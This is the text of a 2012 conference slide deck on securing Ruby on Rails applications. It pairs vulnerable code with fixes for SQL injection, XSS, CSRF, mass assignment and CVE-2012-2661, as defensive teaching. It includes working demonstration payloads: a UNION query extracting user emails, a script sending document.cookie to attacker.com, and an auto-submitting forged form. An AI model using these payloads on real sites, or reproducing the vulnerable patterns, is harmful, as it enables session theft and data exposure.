<x> Description - Rails Web Application Security

1. WEB APPLICATION
SECURITY IN RAILS
Uri Nativ
RailsIsrael 2012

2. Uri Nativ
@unativ
Head of Engineering
Klarna Tel Aviv
#railsisrael

3. Buy Now, Pay Later
1. Shop online
2. Receive your goods
3. Pay

4. Alice

5. Bob

6. Alice and Bob

7. Alice and Bob

8. Alice and Bob
Like Duh?

9. Alice and Bob
<html>
<title>
MicroBlogging
</title>
...
#$@#
%#@&*#$

10. Alice and Bob
Hack it!

11. SQL INJECTION

12. @results = Micropost.where(
"content LIKE '%#{params[:query]%’”).all
SELECT 'microposts'.*
FROM 'microposts’
WHERE (content LIKE ’%SEARCHSTRING%’)
SQL Injection

13. SELECT 'microposts'.*
FROM 'microposts'
WHERE (content LIKE '%SEARCHSTRING%')
SQL Injection
XXX')
UNION
SELECT 1, email, 1, 1, 1
FROM users --

14. SELECT 'microposts'.*
FROM 'microposts'
WHERE (content LIKE '%XXX')
UNION
SELECT 1, email, 1, 1, 1
FROM users -- %')
SQL Injection

15. SELECT 'microposts'.*
FROM 'microposts'
WHERE (content LIKE '%XXX')
UNION
SELECT 1, email, 1, 1, 1
FROM users -- %')
SQL Injection

16. @results = Micropost.where(
"content LIKE ?’, "%#{params[:query]}%”)
).all
SQL Injection - countermeasures

17. CROSS SITE
SCRIPTING
XSS

18. <span class="content">
<%= raw feed_item.content %>
</span>
XSS

19. <script>
document.write('<img src=
"http://www.attacker.com/x.png?' +
document.cookie + ’”
>');
</script>
XSS

20. <span class="content">
<%= sanitize feed_item.content,
:tags => ['a’]
%>
</span>
XSS - countermeasures

21. The Attack:
Execute arbitrary code / defacement
JSON is not escaped by default
CSS can be injected as well
Countermeasures:
Never trust data from the users
Use Markdown (e.g. Redcarpet gem)
XSS

22. CROSS
SITE
REQUEST
FORGERY
CSRF

23. www.blog.com
CSRF
1

24. www.blog.com
2
Click
here for
free iPad
www.freeiPad.com
<form name=“evilform”
action=“www.blog.com/….”>
…
<script>
document.evilform.submit()
</script>
CSRF

25. www.blog.com
www.freeiPad.com
<form name=“evilform”
action=“www.blog.com/….”>
…
<script>
document.evilform.submit()
</script>
CSRF
3

26. www.blog.com
www.freeiPad.com
<form name=“evilform”
action=“www.blog.com/….”>
…
<script>
document.evilform.submit()
</script>
POST /blogpost
Content=“Kick Me!”
CSRF
4

27. <input
name ="authenticity_token”
type ="hidden”
value ="vyFdEgofzU4oSJJn5wypxq4“
/>
CSRF – Authenticity Token

28. routes.rb
match '/delete_post/:id',
to: 'microposts#destroy'
CSRF

29. class ApplicationController <
ActionController::Base
# commented to easily test forms
# protect_from_forgery
...
end
CSRF

30. The Attack:
Attacker send requests on the victim’s behalf
Doesn’t depend on XSS
Attacked doesn’t need to be logged-in
Countermeasures:
Use Rails CSRF default protection (do not override it)
Use GET for queries
Use POST/DELETE/… when updating data
Add Sign-out link
CSRF

31. RAILS SPECIFIC
ATTACKS

32. MASS
ASSIGNMENT
boo[gotcha!]

33. def create
@user = User.new(params[:user])
...
end
Mass Assignment

34. def create
@user = User.new(params[:user])
...
end
Mass Assignment
{ :name => “gotcha”,
:admin => true }

35. Blacklist
class User < ActiveRecord::Base
attr_protected :admin
...
end
Mass Assignment - countermeasures

36. Whitelist
class User < ActiveRecord::Base
attr_accessible
:name,
:email,
:password,
:password_confirmation
...
Mass Assignment - countermeasures

37. Global Config (whitelist)
config.active_record.
whitelist_attributes = true
Mass Assignment - countermeasures

38. The Attack:
Unprotected by default :(
Countermeasures:
Whitelist
Blacklist
Strong Parameters (whitelist)
Rails 4
Logic moved to the controller
Available as a Gem
Mass Assignment

39. SQL INJECTION
VULNERABILITY IN
RUBY ON RAILS
(CVE-2012-2661)

40. User.where(
:id => params[:user_id],
:reset_token => params[:token]
)
SELECT users.*
FROM users
WHERE users.id = 6
AND users.reset_token = ’XYZ'
LIMIT 1
CVE-2012-2661 SQL Injection

41. /users/6/password/edit?token[]
SELECT users.*
FROM users
WHERE users.id = 6
AND users.reset_token IS NULL
LIMIT 1
CVE-2012-2661 SQL Injection

42. The Attack:
SQL Injection - Affected version: Rails < 3.2.4
Countermeasures:
Upgrade to Rails 3.2.4 or higher
CVE-2012-2661 SQL Injection

43. -------------------------------------------------
| Warning Type | Total |
-------------------------------------------------
| Cross Site Scripting | 2 |
| Cross-Site Request Forgery | 1 |
| Denial of Service | 1 |
| Redirect | 1 |
| SQL Injection | 4 |
-------------------------------------------------
Brakeman

44. CONCLUSIONS

45. Make Love not War

46. Know the threats – OWASP top 10
Follow Rails conventions
Ruby on Rails Security Guide
http://guides.rubyonrails.org/security.html
The Ruby on Rails security project
http://www.rorsecurity.info
Rails security mailing list:
http://groups.google.com/group/rubyonrails-security
Conclusions

47. Daniel Amselem for pair programming
Irit Shainzinger for the cool graphics
Michael Hartl for his microblogging app tutorial
Thanks to…

48. Pay Online – Safer and Simpler
https://github.com/unativ/sample_app